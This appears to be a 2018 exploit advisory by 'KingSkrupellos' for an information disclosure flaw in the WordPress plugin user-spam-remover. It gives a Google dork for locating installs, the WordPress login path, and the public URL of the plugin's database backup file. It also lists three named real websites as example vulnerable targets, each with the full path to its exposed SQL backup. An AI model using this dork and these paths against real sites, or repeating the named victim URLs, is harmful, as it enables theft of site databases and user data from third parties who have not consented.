WordPress user-spam-remover Plugins Database Backup Vuln

1. #################################################################################################
2.  
3. # Exploit Title : WordPress user-spam-remover Plugins Database Backup Information Disclosure Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 28/11/2018
6. # Vendor Homepage : wordpress.org/plugins/user-spam-remover/
7. + lyncd.com/user-spam-remover/
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Version Information : All Current Versions.
11. # Google Dorks : inurl:''/wp-content/plugins/user-spam-remover/''
12. # Exploit Risk : Medium
13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
14. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
15. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
16.  
17. #################################################################################################
18.  
19. # Admin Panel Login Path :
20.  
21. /wp-login.php
22.  
23. # Exploit :
24.  
25. /wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql
26.  
27. #################################################################################################
28.  
29. # Example Vulnerable Sites =>
30.  
31. [+] howafrica.com/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql
32.  
33. [+] sarawakvoice.com/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql
34.  
35. [+] americasbestmyspace.com/myspace-comments-blog/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql
36.  
37. #################################################################################################
38.  
39. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
40.  
41. #################################################################################################